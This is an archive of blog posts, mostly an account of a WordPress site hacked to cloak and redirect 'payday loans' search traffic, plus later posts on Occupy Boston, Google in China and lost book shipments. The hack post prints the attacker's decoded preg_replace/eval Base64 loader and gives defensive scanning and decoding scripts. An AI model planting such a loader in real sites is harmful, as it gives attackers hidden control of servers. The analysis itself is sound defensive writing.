A Tale of East Asian History, British Loan Sharks, and a Russian Hacker

A few weeks back I woke up at 6:30 in the morning to a phone call.

“I would like to buy your domain froginawell.net. $500, what do you say?”

I instinctively tried to answer in a voice that did not reveal the fact I had just been jolted out of deep sleep. There may have been a few introductory sentences preceding this very forward proposition but I wasn’t fully conscious yet.

Frog in a Well is a site I created back in 2004 to host a few academic weblogs about East Asian history authored by professors and graduate students. I haven’t been posting much there while I finish the PhD dissertation, but some of my wonderful collaborators have been keeping it active. Since we have a good stock of postings on a wide range of topics in East Asian history, the site attracts a fair amount of traffic, especially from those searching Google for “ancient Chinese sex” or, apparently, “Manchu foot binding.” I think these visitors find the resulting links insufficiently titillating for their needs. Our site has been ad free, however, and I fully intend to keep it that way.

I turned the gentleman down and went back to sleep. When I reached the office, I saw an email from the man, let’s call him Simon. He made the same direct offer, which came in a few minutes before he called. I replied to his email and explained I had no wish to sell the domain.

A week later Simon emailed again. This time he wanted to rent my domain.

Looks like someone’s tried to hack you unless you have changed your home page title?? Anyway your ranking has increased for my key phrase and I really want to rent that home page. I will increase my offer to $150 PER DAY.

$150 per day? Key phrase? What key phrase did Frog in a Well offer him? His email address suggested he worked at a solar energy company in the UK. The site looked legitimate, offering to set up solar power for homes for a “reasonable price.” I searched in vain for any clue as to why he would want the domain froginawell.net. I did a search on our site for anything to do with solar power or energy. Nothing stood out. I didn’t want to ask him, since I didn’t want to get his hopes up.

As for the hacking, this had happened before. Sometimes I have been a little slow in getting our WordPress installations upgraded and twice before our blogs have been hit with something called a “pharma hack.” This insidious hack leaves your website looking just like it did before but changes its contents when Google searches your site, changing all blog posting titles into advertisements for every kind of online drug ordering site you can imagine. It is notoriously difficult to track down as the hackers are getting better and better at hiding their code in the deep folder hierarchies of WordPress or in un-inspected corners of your database.

This time, however, it looked like there was no pharma hack. Instead, my home page for froginawell.net had been changed from a simple html file into a php file, allowing it to execute code. The top of the file had a new line added to it with a single command with a bunch of gibberish. At the time, I had no time to look at it in depth. I was trying to wrap up the penultimate chapter of my dissertation. I removed the offending text, transformed my home page back into html, changed the password on my account, reinstalled the China blog from scratch (which had been hacked before), and sent an email to my host asking for help in dealing with a security breach. My host replied that they would be delighted to help if I paid them almost double what I was currently paying them by adding a new security service. Otherwise, I was on my own.

After my rather incomplete clean up based on where I thought the hacked files were, I replied to Simon, “The offer is very generous, but I’ll pass. I’ve decided to keep our project ad-free.”

Simon wrote back again the same day. He was still seeing the title of my hacked page on Google. I couldn’t see what he was talking about when I searched for Frog in a Well on Google, but assumed he was looking at some old post that had been cached by Google back when it was in its hacked form. Simon wrote:

Do you realize why people are suddenly trying to hack you? Because of the earning potential your site currently has.

I would appreciate if it you would name your price because everyone has one and I don’t want either of us to miss this opportunity. I can go a somewhat higher on the daily fee if it would strike a deal between us. How about $250 per day. If money is no object then donate the $250 a day to charity.

$250 a day? This was downright loopy and getting more suspicious all the time. I was traveling over Memorial Day weekend at the time. If the offer was real, and I was willing to turn the Frog in a Well homepage into someone’s ad, it still would have been a pain for me to deal with, and it all was too fishy. I turned him down and told him I thought the matter was closed: I wouldn’t accept ads on Frog in a Well for any price.

Simon wrote back one last time.

As a businessman I always struggle with the concept of no available at any price when it comes to a business asset. However, I respect your decision and will leave you with this final message. I will make one final bid then will be out of your hair if you decide you do not want it. $500 per day payable in advance. Practically $200,000 a year.

He was clearly perplexed at my refusal to behave like a rational economic actor. I completely understand his frustration. Perhaps he hasn’t met many crunchy socialist grad student types. I wrote him back a one-liner again turning down his offer but wishing him luck with his business, which, at this point, I still assumed was a solar power company.

When I got home, I determined to resolve two mysteries: 1) What was Simon seeing when he found Frog in a Well on Google in its hacked state? 2) Why on earth would Simon want to go from $500 total to buy my domain to $500 a day to rent it?

The first thing I discovered was that my site was still compromised. The hackers had once again modified my home page, turned it into a .php file and added a command at the top that contained lots of gibberish. Their backdoor did not reside, as I had assumed, in the oldish installation of the China blog I had replaced but somewhere else. I would have to have a go at reverse engineering the hack.

Anatomy of a Hack

The command that the hackers added to the top of my home page was “preg_replace” which in PHP simply searches some text for a term, and replaces it with some other text.

preg_replace("[what you are searching for]","[what you wish to replace it with]","[the text to search]")

In this case, all of this was obscured to me with a bunch of gibberish like “\x65\166\x61\154”. This text is actually just an alternating mix of ASCII codes in two different formats, octal and hexadecimal. PHP knows not to treat them like regular numbers because of the escape “\” character, which is followed by x for the hexadecimal numbers and by the digits alone for the octal ones. You can find their meanings on this chart. For example, the text above begins with \x65, which is the hexadecimal for “e” and then the octal for “v” and back to hexadecimal for “a” and then finally octal for “l,” all together “eval.”
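As a quick check on that reading, here is a minimal Python sketch that decodes the four escapes quoted above. The function name decode_escapes is made up for illustration, and the sketch assumes the gibberish is plain ASCII text containing only hexadecimal (\xHH) and octal (\OOO) escapes.

```python
def decode_escapes(raw: str) -> str:
    """Turn literal backslash escapes (\\xHH hex, \\OOO octal) into characters."""
    # unicode_escape understands the same hex and octal escapes as a
    # Python string literal, so the text does not need to be retyped.
    return raw.encode("ascii").decode("unicode_escape")


# A raw string keeps the backslashes literal, as they appear in the hacked file.
obfuscated = r"\x65\166\x61\154"

# Each escape decoded by hand: base 16 for \xHH, base 8 for \OOO.
by_hand = [chr(int("65", 16)), chr(int("166", 8)), chr(int("61", 16)), chr(int("154", 8))]

print(decode_escapes(obfuscated))  # eval
print("".join(by_hand))            # eval
```

Reading 166 and 154 as decimal would give values outside the ASCII range, which is one way to tell that the three-digit escapes are octal.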

This makes it extremely difficult for a human such as myself to see what is going on, but perfectly legible to the computer. I had to restore all the gibberish to regular characters. I did this with python. On my Mac, I just opened up the terminal, typed python, and then printed out the gibberish ASCII blocks with the python print command:

print("[put your gibberish here]")

This yielded a command that said:

Look for: |(.*)|ei
Replace it with: eval('$kgv=89483;'.base64_decode(implode("\n",file(base64_decode("\1")))));$kgv=89483;
In the text: L2hvbWUvZnJvZ2kyL3B1YmxpY19odG1sL2tvcmVhL3dwLWluY2x1ZGVzL2pzL2Nyb3AvbG9nLy4lODI4RSUwMDEzJUI4RjMlQkMxQiVCMjJCJTRGNTc=

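Now I was getting somewhere. The “e” at the end of the search pattern is what makes this dangerous: in the PHP versions of the time, that modifier tells preg_replace to execute the replacement text as PHP code. But what is all this new flavor of gibberish at the end? This text is encoded using the Base64 encoding method. If you have a file (only) with Base64 encoded text you can decode it on the Mac OS X command line with:

base64 -D -i encoded-text.txt -o decoded-text.txt

On Linux, the equivalent is:

base64 -d encoded-text.txt > decoded-text.txt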

You can also decode base64 in Python, PHP, Ruby, etc. or use an online web-based decoder. Decoded, this yielded the location of the files that contained more code for it to run:
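The same decoding can be sketched in Python with the standard base64 module. The encoded string is copied from the “In the text” line above; the variable names are only illustrative.

```python
import base64

# The Base64 text that the hacked home page passed to preg_replace.
encoded = (
    "L2hvbWUvZnJvZ2kyL3B1YmxpY19odG1sL2tvcmVhL3dwLWluY2x1ZGVzL2pzL2Nyb3AvbG9n"
    "Ly4lODI4RSUwMDEzJUI4RjMlQkMxQiVCMjJCJTRGNTc="
)

# b64decode returns bytes; the result here is plain ASCII, a file path.
decoded = base64.b64decode(encoded).decode("ascii")
print(decoded)
```

The printed path sits under korea/wp-includes/js/crop/log/ and ends in a hidden dot-file with a name made of percent signs and hexadecimal digits.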


It wasn’t alone. There were a dozen files in there, including text for an alternate homepage. The code in my home page, with a single command up front, was running other commands hidden in a folder deep in the installation of my Korea blog. Even these filenames and their contents were encoded with a variety of methods including base64, MD5 hashing, characters turned into numbers and iterated by arbitrary values, and various contents stored in the JSON format. I didn’t bother working out all of its details but it appears to serve a different home page only to Google and only under certain circumstances.
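The chain in the replacement string (decode the path, read the file, join its lines, decode again, then eval) can be followed safely by stopping one step short of the eval. The sketch below is a rough Python equivalent for inspection only. The name unwrap_payload and the demo file are hypothetical, and it assumes the hidden file holds nothing but Base64 text, which may not be true of every file in such a folder.

```python
import base64
import tempfile
from pathlib import Path


def unwrap_payload(encoded_path: str) -> str:
    """Follow the loader chain but return the hidden source instead of running it."""
    # Step 1: the subject string is itself a Base64-encoded file path.
    path = base64.b64decode(encoded_path).decode("utf-8", errors="replace")
    # Step 2: read the file it points to. Line breaks do not matter here,
    # because b64decode discards non-alphabet bytes by default.
    blob = Path(path).read_bytes()
    # Step 3: decode the contents into readable source. No eval happens.
    return base64.b64decode(blob).decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Hypothetical stand-in for the hidden file: harmless PHP, Base64-encoded.
    with tempfile.TemporaryDirectory() as folder:
        hidden = Path(folder) / ".payload"
        hidden.write_bytes(base64.encodebytes(b"<?php echo 'hello'; ?>"))
        pointer = base64.b64encode(str(hidden).encode("utf-8")).decode("ascii")
        print(unwrap_payload(pointer))
```

Returning the text rather than executing it is the whole point of the design: the output can be read, searched, and decoded further without giving the attacker's code a chance to run.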

One of the hacked files produced a version of the British payday loan scam speedypaydayloan.co.uk, which connects back to a fake London company “D and D Marketing” which can be found discussed in various places online for its scams. In other words, for Britain-based, and only Britain-based visitors to Google who were looking for “payday loans,” a craftily hacked homepage at Frog in a Well was apparently delivering them to a scam site or redirecting to any one of a number of other sites found in a large encoded list on my site.
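One rough way to test for this kind of cloaking is to request the same page twice, once announcing yourself as an ordinary browser and once as Google's crawler, and compare what comes back. The Python sketch below does that. The function names are made up for illustration and the browser string is just an example. It is only a first check: a cloak that keys on the visitor's IP address, country, or referring search page, as this one apparently did, will not be fooled by a changed User-Agent, and pages with dynamic content can differ for innocent reasons.

```python
import hashlib
import urllib.request
from typing import Callable

BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64) ExampleBrowser/1.0"
CRAWLER_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def fetch(url: str, user_agent: str) -> bytes:
    """Download a page while sending the given User-Agent header."""
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(request, timeout=10) as response:
        return response.read()


def looks_cloaked(url: str, fetcher: Callable[[str, str], bytes] = fetch) -> bool:
    """Return True when browser and crawler requests get different bodies."""
    as_browser = hashlib.sha256(fetcher(url, BROWSER_UA)).hexdigest()
    as_crawler = hashlib.sha256(fetcher(url, CRAWLER_UA)).hexdigest()
    return as_browser != as_crawler
```

Calling looks_cloaked("http://example.com/") would make two live requests; passing a different fetcher makes it possible to try the comparison against saved copies of a page instead.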

I soon discovered that these files were not the only suspicious ones in the Korea blog installation, however. These were just the files which produced the specific result desired by the hacker. After a lot more decoding of obscured code, I was able to find the delivery system itself. To deploy this particular combination of redirection and cloaking of that redirection, the attacker was using a hacker’s dream suite: something called “WSO 2.5.” Once they found a weakness in an older version of WordPress on my domain, they were able to install the WSO suite in a hidden location separate from the above hack. Though I don’t know how long this YouTube video (without sound) will remain live, you can see what the view of the hacker using WSO looks like here. The actual PHP code for a plain un-obscured installation of the backdoor suite that was controlling my server can be found (for now) on pastebin here.
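Hunting for files like these by hand is slow, so a crude scanner can help narrow the search. The Python sketch below walks a folder and flags files that contain the markers seen in this hack: eval calls, base64_decode calls, long runs of hex or octal escapes, and hidden dot-files. The marker list and the name scan_tree are illustrative assumptions, not a complete detector. Legitimate code (and files such as .htaccess) will trigger some of these, and a careful attacker can avoid all of them.

```python
import os
import re
from typing import Dict, List

# Heuristic markers only; each one also occurs in some legitimate code.
MARKERS = {
    "eval call": re.compile(rb"\beval\s*\("),
    "base64_decode call": re.compile(rb"\bbase64_decode\s*\("),
    "run of hex/octal escapes": re.compile(rb"(?:\\x[0-9A-Fa-f]{2}|\\[0-7]{3}){4,}"),
}


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Map each suspicious file under root to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for folder, _subfolders, files in os.walk(root):
        for name in files:
            path = os.path.join(folder, name)
            try:
                with open(path, "rb") as handle:
                    data = handle.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            reasons = [label for label, pattern in MARKERS.items() if pattern.search(data)]
            if name.startswith("."):
                reasons.append("hidden dotfile")
            if reasons:
                findings[path] = reasons
    return findings
```

Running scan_tree on a copy of the site, rather than on the live server, keeps the check from touching anything the attacker may still control.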


Simon and Friends

So how does this connect back to our friend Simon and his solar power company? Google webmaster tools revealed that the top search term for Frog in a Well was currently “payday loans” and it had shot up in the rankings some time in early May when the hack happened, with hundreds of thousands of impressions. Something was driving the rankings of the hacked site way up.

Simon had written in one of his emails that he had “many fingers in many pies” which suggested that he was working with more than just a solar power company. After figuring out what my hacked site looked like, I searched for his full name and “loans uk” and soon found that he (and often his address) was listed as the registrant for a whole series of domains, at least one of which had been suspended. These included a payday loan site, a mobile phone deal website, a home loan broker, some other kind of financial institution that no longer seems to be around, and another company dedicated to alternative energy sources. My best guess is that Simon’s key phrase was none other than “payday loans” and he saw a way to make a quick buck by getting one of his financial scams advertised through the newly compromised Frog in a Well domain. Was he really serious about paying that kind of amount? What had been his plan for how this was going to pan out? Did he know that the Google ranking was probably a temporary result of a deeply hacked site?

Simon’s offer of $500 was not the last. I removed all the hacker’s files, installed additional security, changed passwords, and began monitoring the raw access files of my server. I requested a review of my website by Google through the webmaster tools that hopefully will get me out of the payday loan business in the UK. However, the offers continued to come in.

Luke, one of Simon’s competitors (again, I’m changing all names), wrote me a polite email with a more forthcoming offer that confirmed what I had found by poking through the files:

You may not be aware but your site has been hacked by a Russian internet marketing affiliate attempting to generate money in the UK from the search term “payday loans”…As a rough indicator this link is worth around $10,000 a week to the hacker in its current location. We are a large UK based competitor of this hacker and whilst we don’t particularly his activity, we’d like to stop him benefiting from this by offering to replace this hyperlink on your site which he has inserted and pay you the commissions weekly…

It was “clever stuff,” he explained, “but very illegal.” I turned him down politely.


No sooner had I cleaned up my server than it began to come under DOS attack (denial of service). The three blogs at Frog in a Well were hit by about a dozen zombie bots from around the world who tried to load the home page of each blog over 48,000 times in the span of 10 minutes. My host immediately suspended my account for the undue stress I was causing to their server. They suggested buying a dedicated server for about 10 times the price of my current hosting. I had moved to the current host only a year earlier when our blogs came under DOS attack, mostly from China, and the earlier host politely refused to do anything about it. My current host was kind enough to reinstate the site after a day of monitoring the situation but there is nothing to prevent an attacker from hiring a few minutes of a few bots to take down the site again. It is a horrible feeling of helplessness that can really only be countered with a lot of money – money I was not about to attempt to make by entering the payday loan business. To add a show to the circus, within hours of being suspended two separate security companies contacted me, promising protection against DOS attack and asked if I wanted to discuss signing up for their expensive services. How did they know I had been attacked by DOS in the first place and not suspended for some other reason?
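To put those attack figures in perspective, 48,000 requests in 10 minutes works out to 80 requests per second against each blog. The Python sketch below does that arithmetic and also shows one simple way to spot the noisiest clients in a raw access log. It assumes the common Apache-style log layout in which the client address is the first field on each line. The function names and sample lines are invented for illustration and use reserved documentation addresses.

```python
from collections import Counter
from typing import Iterable


def requests_per_second(total_requests: int, seconds: float) -> float:
    """Average request rate over a window."""
    return total_requests / seconds


def hits_per_client(log_lines: Iterable[str]) -> Counter:
    """Count requests per client, taking the first field as the address."""
    counts: Counter = Counter()
    for line in log_lines:
        fields = line.split()
        if fields:
            counts[fields[0]] += 1
    return counts


if __name__ == "__main__":
    print(requests_per_second(48_000, 10 * 60))  # 80.0

    # Made-up sample lines in the assumed log layout.
    sample = [
        '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET / HTTP/1.1" 200 512',
        '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET / HTTP/1.1" 200 512',
        '198.51.100.7 - - [01/Jan/2000:00:00:02 +0000] "GET / HTTP/1.1" 200 512',
    ]
    for client, hits in hits_per_client(sample).most_common(3):
        print(client, hits)
```

A count like this only identifies who is hammering the server. Blocking them is a separate matter, and on shared hosting it may not be possible without the host's help.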

A few days later, yet another payday loan operator, let us call him Grant, contacted me through Twitter. He explained that the “Russian guy” who he believed had hacked me was likely “untouchable for his crimes” thanks to his location but again suggested that we “take advantage of this situation” and split the proceeds of linking my site to him 50/50.

I will pay you daily, depending on how much it makes either by Paypal or bank transfer. As an indication of potential profits, when I have held 1st place I have been regularly making £15,000 per day. I can see your site bouncing around the rankings so I am unsure how much it would make… I suspect it would be comfortably into 4 figures a day but without trying I can’t say for sure.

I turned him down and explained that I had cleaned out the hack. It would take some time before this would be reflected on Google. However, in response to my request for more information about what he knew about the hack, Grant kindly sent me a long list of other sites that had been hacked by my attacker but whose only role in this game was to backlink to Frog in a Well with the link text “payday loans” so that Google would radically increase my ranking. Luke had suggested that this approach was only effective because Frog in a Well was already a relatively “trusted” site by Google. Grant (emailing me directly from the beach, he said, which I guess is a good place for someone pulling in thousands of pounds per day on this sort of thing) also supplied me with half a dozen other sites that were now being subjected to the very same cloak and redirect attack. He speculated that I had come under DOS attack from one of his other competitors who, instead of attempting to buy my cooperation, had spent the negligible cost required to simply knock me off the internet.

Hopefully my ordeal will be over soon, and I need merely keep a closer eye on my servers. For Grant, Luke, and Simon, however, their Russian nemesis continues his work. A last note from Grant reported,

There is an American radio station ranking for payday loans on google uk now, so that’s yet more work for me to try and undo lol.

Update: My thanks to 陈三 for translating this post into Chinese.

Notes from A Solidarity March with Occupy Boston

On Monday I joined in the Student Solidarity March for Occupy Boston together with a few friends and I thought I would share a few notes.

I don’t have much experience with protesting. Though I consider myself active politically, I have joined fewer than half a dozen large protest rallies and marches, and almost all of them were related to the issue of immigration. It was a fascinating experience, differing in many ways from other protests I had joined before but again, due to my small sample size, it is very possible that some of the elements described below are, in fact, common features and my observations reveal the ignorance of a tourist.

Harvard University Occupies Boston

The first scene was at Harvard. Before converging on the Boston Common where the main march was to begin, students from around the city gathered at their own university. Harvard and MIT students were, at least according to posters and emails before the gathering, to assemble together and occupy the subway (since we were apparently too lazy to walk the hour or so downtown). The initial assembly point was at the wonderfully neutral location of the John Harvard statue inside the Harvard campus (meeting at MIT would have put us much closer to the main march). I showed up wearing a Columbia shirt to break the Crimson tide, thus, of course, completely sparing me any elitist stain. Instead of hiking up deep into our territory, our MIT friends made it downtown in a few separate groups, presumably in flying cars, teleportation devices, or astride their communally shared fleet of robot dogs.

The poster for the event advertising “Harvard University Occupies Boston” was the first reminder of the somewhat awkward positionality of our merry band. Of course Harvard University already, in a very real sense, Occupies Boston through the power the university itself wields, what it represents, but most directly through the many graduates of the university who heavily populate the ranks of the financial, consulting, and law firms throughout the city. This awkwardness would continue to be manifested whenever the slogan “We are the 99%” was yelled. We debated among ourselves the intricacies of how that phrase might be construed to include or exclude us. Should we write self-criticisms, joked one, but the idea may well have received a warm reception if put to the crowd.

Hallelujah and The People’s Mic

Somewhere between 50 and 5000 people showed up at the John Harvard statue, but as you know, counting attendance at protests is an inexact science. Before we boarded the subway downtown, there were posters to be made, and an opportunity for discussion.

The Occupy Boston and Occupy Wall Street movements are extremely decentralized, with diverse groups and diverse goals represented. They are thus easy to mock and hard to categorize. It is becoming harder, however, to ignore them and I joined in order to express my support but also to try to better understand them. If the political goals are still varied, there seems to be, at least, a set of common practices emerging. Let me list a few of them:

Many Groups, One Shopping List – Despite the diversity, they seem to be incredibly organized online, where you can find news, a press kit, a garbage collection schedule, general assembly videos, and even a unified shopping list.

The People’s Mic – Though our pre-march discussion was too short to see it fully in action, direct democracy assemblies are designed to allow anyone to speak. In order to make sure that everyone can hear the speaker, everything spoken is repeated by the crowd, phrase by phrase. I’m told this comes from the Occupy Wall Street protests, where a ban on voice amplifying devices made the innovation necessary. To speak before the group you add your name to a “stack” (waiting list) which one of the facilitators manages. When it is your turn you yell, “Mic Check!” and the crowd responds with “Mic Check!” After that, every phrase you utter will be repeated by the crowd, though I noted that when more extreme or controversial things were said, the mass echo was notably less enthusiastic. It is a fascinating technique, which surely makes long political meetings slightly more than twice as long, but for this very reason it encourages brevity and clarity in a speaker. The effect can be an intoxicating experience, but also very empowering. The nagging Orwellian feel of the robotic repetition is well mitigated by the fact that you are not repeating the words of “The Leader,” but of everyone who speaks. Rachel Maddow describes the practice and shows examples:
People’s Mic! Today’s Best New Thing in the World

Gesturing the Revolution – The first task carried out by the “facilitators” at the Harvard Statue (who nominated these people to be our facilitators and what organizations they came from was not, as far as I can remember, ever revealed) was to give us a basic education in crowd communication. After explaining the People’s Mic they introduced us to a system of hand signals I have never seen before but which has been commented upon in various media reports. Our lesson included the following instructions:

1. If you agree with what a speaker is saying raise your hands and wiggle your fingers. If you had not been told this was its purpose, you might suspect the person was offering a “Hallelujah!”
2. If you are more ambivalent about what a speaker is saying, you wiggle your fingers in front of your chest.
3. If you disagree with the speaker, you hold your hands in front of your chest and flop them down in a motion that to me looked like a begging dog.
4. If you wish to ask a clarifying question you hold up your hand and make the letter “C.”
5. If you wish to make a “process point” which I guess is a kind of point of order, you make another hand signal that I believe resembles a triangle or perhaps a “T.”
6. If you find what the speaker is saying offensive, you cross your arms over your head, creating a large “X.”

At this point an apparently experienced protestor in the audience asked why they did not use a common gesture to indicate that you wanted to make a direct counter-point. One of the leaders—I’m sorry—facilitators, made the reasonable point that this was because that gesture makes it impossible to have smooth discussions without them devolving into rowdy debates. Instead people who disagreed were to add their name to the “stack” and speak in turn.

Now trained in the semiotic arts of the revolution, we began a discussion and a few people on the “stack” spoke, but besides a few Hallelujahs, we didn’t get to deploy the full range of acquired vocabulary before leaving for downtown.

Does anyone know more about the origins of this system? In addition to serving as a system of immediate speaker feedback this appears to be the primary system used for consensus formation at protest general assemblies; a non-binary process known as a “temperature check.” I have seen mention of it in reference to the recent student protests in London. This Guardian article includes a great gesture for “I’m bored” which I must remember to deploy at appropriate moments in academic lectures. I see gestures like those we learned described in Consensus: A New Handbook for Grassroots Social, Political, and Environmental Groups but that work argues strongly against having any gestures of a negative kind in order to reduce speaker anxiety and create a more welcoming environment.

Lawyer Tags – Several people moved through our group of protesters distributing little tags for us to tie to our arms. On one side was information about our protest, the protest Facebook page, Google group, and a contact email. On the other side was the telephone number for the National Lawyers Guild, an important but nothing if not radical legal organization that supports protesters in their encounters with law enforcement. In the event of an arrest, all of our belongings may be confiscated or discarded so this little tag was a nice little reference card. We were also encouraged to copy the phone number onto our arm since the tag might be easily lost.

I should note that both while we were being told about the tags and later on the Boston Common, there was a repeated and strong emphasis on showing respect for law enforcement, non-violence, and following the law (except, I guess, those we break). Which brings me to another fascinating innovation that I have only seen glimpses of in the news before:

Legal Observers – When we got to the assembly point on the Boston Common there were bands playing, the usual anarchists occupying the central gazebo (demonstrating once again the principle that the early herd gets the gazebo), and a wide array of people around the edges. As each new university group arrived (Tufts and U Mass had particularly strong showings, with the latter taking full advantage in their slogans of the fact the word “mass” is in their name) everyone cheered their arrival. Before the full march began, however, more facilitators (again, I have no idea who they were or what organizations they represented) gave us more training through the People’s Mic. They pointed to a number of neon hat and vest clad individuals hovering around the edges of our mass, just in front of a row of police officers observing us. These were to be our “legal observers” tasked with the job of being neutral observers of the protest. They would monitor the behavior of the protesters, and especially observe any clashes or interactions between the protest and law enforcement. Since I believe at least some of them were from the National Lawyers Guild, I have some doubts about their neutrality, but overall, I must say, I was quite impressed by their number, and I think their presence throughout the march on the sidelines was a great comfort, even if no one expected a clash with the police.

Protest as Socializing Process

My overall experience on Monday was very positive. The energy, most of it positive, and the diversity of the people involved left a strong impression on me. The slogans were often too pointlessly populist, dry or cliche, and clearly many of us were just a bit confused about what the whole experience added up to. We marched down to the occupied Dewey Park and circled around it. Later that night, some students and others who decided to join the “occupation” were arrested by the police and I’ll await more accounts of what transpired before commenting on it. I do hope the occupation continues, even if it does not graduate beyond the realm of political experiment, and that it evolves and develops politically.

There are a whole slew of ways this movement is being described and justified by its sympathizers and participants alike. I have not yet formed a strong opinion on how best to conceptualize it, but I feel that at least on two levels there is something important happening. From the outside, as long as the “occupy” movement continues and grows without becoming violent, it has a place at the table of political discussion. Its destabilizing effect can play a very important part in a stalled political process. Even if its internal unity remains dependent upon its ambiguity, it is like the tormented Poe’s Raven which, “never flitting, still is sitting, still is sitting / On the pallid bust of Pallas just above my chamber door.”

From the inside, even from the limited contact I had with the movement on Monday, participation in a movement like this, and many like it, is a socializing process, especially when it is full of innovative approaches: socializing participants but also teaching them a set of valuable political practices that can, in turn, be deployed again and again with greater focus in a whole range of circumstances. Monday was a holiday, but I very much felt like class was in session.

Google and the Pragmatic Idealist Response

Google has made an unprecedented threat to end the censorship of its search results in China and, if this is unacceptable to the Chinese government, even contemplate leaving the Chinese market. The announcement has been combined with the admission that there has been a massive coordinated attack on Google’s security and the potential targeting of private records of human rights activists.

It remains to be seen what Google will actually do in the near future. I am inspired to post something about this unusual moment in order to make two comments. First, I wish to respond to a kind of cynical reaction to Google’s announcement that I find frustrating. Second, I wish to argue that this is an opportunity for anyone who wants to see a China which one day permits the open, free, and competitive exchange of ideas. As such we need to think about how to amplify its potential impact.

The Google announcement has deservedly generated a huge response, even though it coincides roughly with the terrible news of the destruction in Haiti. The reactions are many, and I’m particularly interested in the variety of responses among Chinese which so far seem to range from complete shock, through quiet or vocal support for Google, to a misguided anti-imperialist attitude of “good riddance.”

One of the responses I find incredibly unproductive. Two representative examples can be seen in this TechCrunch article and a posting by Evgeny Morozov at Foreign Policy. Their message is essentially a cynical one: It is foolish for us to pour praise on Google for what deceptively seems like a just moral stance – the corporation is merely acting out of pure calculated greed.

This is, in my opinion, a complete waste of words, an unnecessary attempt to dampen enthusiasm about what is potentially, but by no means guaranteed to be, a historic moment. No one should be surprised to discover that corporations act in the interest of their profits and shareholder benefits. No one should be surprised to learn that Google is doing a cost-benefit calculation with relation to its future in the Chinese market and we still don’t know what its final fate in China will be. These things should merely be accepted as the “bloody obvious.”

Which brings me to my second point: what are we going to do about it? What potential impact, if any, can this have on a cause many of us care about?

Pragmatic Idealism

I couldn’t give a shit about the profits of Google, or what its real motivations are. I do care, however, what the reactions of the Chinese people are to this and what marginal influence this move can have on efforts within China to change the information environment in the near and the long term.

From that perspective, it is not obvious that Google dropping censorship and withdrawing from the Chinese market is in the best interests of freedom of information in China, even if it were followed by all other foreign companies. If the internet environment in China is dominated completely by Chinese companies who are perfectly willing to censor all of its content, this may result in a worse situation than one in which foreign search engines and some international social and media websites have limited, if censored, presence in China, with even a small percentage of the market share there. Coming from someone who studies traitors and treason, this seems to me to be the classic collaborator’s dilemma: will collaboration limit the damage? Will resistance result in a worse outcome?

The answer is not always that resistance is better – sometimes collaboration is better. Sometimes negotiating with evil produces more good. Sometimes subversion hidden behind compliance is the path to take. These things should be carefully evaluated according to circumstances. Clearly, however, in some cases resistance is the better choice and can move things perceptibly towards a desired end.

The answer is not obvious, but I think in this case, if Google were to take a stand, it would matter: despite its low market share, Google has made a splash on the Chinese market, and young Chinese engineers and educated people all over the country recognize and respect the company – many of them dream sincerely of one day working at the corporation. Even some Chinese friends who use the competitor Baidu are disgusted with its corrupt history of manipulation of hits to promote advertising revenues, its occasionally substandard results (sometimes even with Chinese search terms!) and lack of innovation.

Having made its mark and built a well-known brand, Google would then suddenly withdraw in a blaze of glory, removing censorship from its search results for a short time as it leaves. At the very least this will likely produce a memorable reaction: some in China will feel shame, and others will embrace defiance. Those who are defiant will be forced into the ridiculous position of claiming, “Ha! Be gone stupid imperialistic western company – if you refuse to hide things from us like our dictatorship tells you to, then you are just selfishly giving in to those superior companies who are willing to be more submissive to our glorious Party and ever more powerful, if castrated, Nation.” Those who feel shame will be reminded, yet again, of the contrast between what they are permitted to see, what they may see when they climb over the great firewall, and what most of the rest of the wired world can see, with a few notable exceptions.

However, this isn’t and shouldn’t be up to Google. It is up to us to make it matter: not by hailing Google for its courage, or setting up fan clubs for Google co-founder Sergey Brin. If Google follows through on its decision to say no to collaboration with Chinese censors, we should ask ourselves how we can maximize its impact. There is now a brief moment of opportunity, a time when we can make something like this matter. Instead of cynically deriding Google for merely acting in its own interests, we should be debating how we might best amplify the impact of such a decision while minimizing the similar amplification of a Chinese nationalistic backlash that will inevitably accompany it. The goal is simple: to make the contradictions already obvious to many within China just that much clearer, to make the hypocrisies pointed out by activists within China that much easier to identify, and to increase the discomfort felt by the Chinese government as well as institutions both foreign and domestic. It may result in only one of a “thousand cuts” in the farce that is Chinese media and internet policies, but that is how change is accomplished.

Damage Report: China Box Disaster 2009

I have been doing research in Asia for two years and during this time I have sent back about twenty boxes to the US. Most of these have contained books and a few, especially from Korea, contained important documents that I photocopied in the archives.

Before sending them, I take pictures of their contents, make a little inventory, and in the case of documents, create an index with each document numbered.

I am very happy that since 2004 none of the many boxes I have sent back from Japan, Korea, or Taiwan has gone missing, and their contents have never suffered more than the occasional dented book spine.

This year, however, I had a bit of a disaster. I sent two boxes back from Jinan, China. I sent them in official China Post boxes to New York state via sea.

Altogether my boxes contained about 60 books, padded with a blanket and a few sweaters. Many of the books make up a series on Shandong during the Sino-Japanese and civil wars. Perhaps half of them were out-of-print used books I had spent several days hunting down at various used booksellers in Jinan.

Neither of the original boxes arrived. Instead two new, smaller and very much lighter boxes arrived, containing a collection of about 20 mangled and, in some cases, ripped books. It was stamped “Arrived damaged, New Jersey”

I guess I should be grateful that about 20/60 of my books arrived. I’m also very glad that I hand carried the 20 or so volumes of published but long out of print and restricted distribution (內部) historical documents most important for my dissertation.

While the US postal system is hardly worthy of praise, I have never had more than bruised corners on the many other boxes I have sent back from Asia. Thus, a warning to those of you studying in China: hand carry out the most important stuff.

Wenlin Conversion Script

Wenlin is the best piece of software around for students of Chinese. Among other tools, it has a powerful and handy offline dictionary with very flexible and fast search options.

I know many students of Chinese that use Wenlin to get their definitions and input vocabulary into flashcard software. Most recently I saw someone do this in a coffee shop here in Taipei, and it brought back a lot of memories of me doing the same in Beijing almost a decade ago.

